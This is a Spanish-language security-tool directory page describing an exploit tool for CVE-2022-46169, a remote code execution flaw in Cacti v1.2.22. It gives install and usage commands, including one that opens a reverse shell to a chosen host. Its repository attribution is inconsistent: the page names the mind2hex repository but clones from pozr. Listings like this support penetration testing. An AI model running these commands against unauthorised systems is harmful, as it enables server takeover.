Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-46169-Cacti-v1.2.22-RCE | Kitploit
Herramientas/GitHubGitHub/mind2hex/cve-2022-46169-cacti-v1.2.22-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubmind2hex/cve-2022-46169-cacti-v1.2.22-rce

CVE-2022-46169-Cacti-v1.2.22-RCE

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 2 añosAún no revisado

CVE-2022-46169-Cacti-v1.2.22

Descripción

Esta es una herramienta de explotación automatizada para CVE-2022-46169, una vulnerabilidad en Cacti v1.2.22 que permite la ejecución remota de código (RCE). Combina un bypass de autenticación y una vulnerabilidad de inyección de comandos en el endpoint remote_agent.php. El script está diseñado para la evaluación de seguridad y las pruebas de penetración.

Características

  • Bypass automatizado de autenticación para CVE-2022-46169
  • Ejecución de payloads de inyección de comandos
  • Shell interactiva para post-explotación
  • Soporte opcional de proxy a través de 127.0.0.1:8080
  • Soporte para reverse shell TCP puro o ejecución de comandos no interactiva
  • Modo verbose (--verbose) para salida de depuración detallada

Instalación

root@kitploit:~
git clone https://github.com/pozr/CVE-2022-46169-Cacti-v1.2.22.git
cd CVE-2022-46169-Cacti-v1.2.22
go build CVE-2022-46169-Cacti-v1.2.22.go

Uso

root@kitploit:~
./CVE-2022-46169-Cacti-v1.2.22 -u http://127.0.0.1 -p 80

Para una reverse shell a un host y puerto específicos:

root@kitploit:~
./CVE-2022-46169-Cacti-v1.2.22 -u http://127.0.0.1 -p 80 --rev 192.168.1.10:4444

Opciones

Requisitos

  • Go 1.16+
  • Objetivo ejecutando Cacti v1.2.22 con configuración predeterminada

Descargo de responsabilidad

Esta herramienta es solo para fines educativos y de pruebas autorizadas. El autor no es responsable del mal uso.

Autor

  • @pozr

Licencia

Licencia MIT

Copyright (c) 2024 pozr

Por la presente se concede permiso, de forma gratuita, a cualquier persona que obtenga una copia de este software y de los archivos de documentación asociados (el "Software"), para tratar con el Software sin restricción, incluidos, sin limitación, los derechos de usar, copiar, modificar, fusionar, publicar, distribuir, sublicenciar y/o vender copias del Software, y de permitir a las personas a las que se les proporcione el Software hacer lo mismo, sujeto a las siguientes condiciones:

El aviso de copyright anterior y este aviso de permiso deberán incluirse en todas las copias o partes sustanciales del Software.

EL SOFTWARE SE PROPORCIONA "TAL CUAL", SIN GARANTÍA DE NINGÚN TIPO, EXPRESA O IMPLÍCITA, INCLUIDAS, ENTRE OTRAS, LAS GARANTÍAS DE COMERCIABILIDAD, IDONEIDAD PARA UN FIN PARTICULAR Y NO INFRACCIÓN. EN NINGÚN CASO LOS AUTORES O TITULARES DEL COPYRIGHT SERÁN RESPONSABLES DE CUALQUIER RECLAMO, DAÑOS U OTRA RESPONSABILIDAD, YA SEA EN UNA ACCIÓN DE CONTRATO, AGRAVIO O DE OTRO MODO, QUE SURJA DE, O EN CONEXIÓN CON, EL SOFTWARE O EL USO U OTRO TIPO DE ACCIONES EN EL SOFTWARE.

Descargar herramienta
FlagDescripciónPor defecto
-uURL del objetivo (obligatorio)Ninguno
-pPuerto del objetivo (obligatorio)Ninguno
--revHost:puerto de la reverse shellVacío
--verboseHabilitar modo verboseFalso
--proxyForzar el uso del proxy 127.0.0.1:8080Falso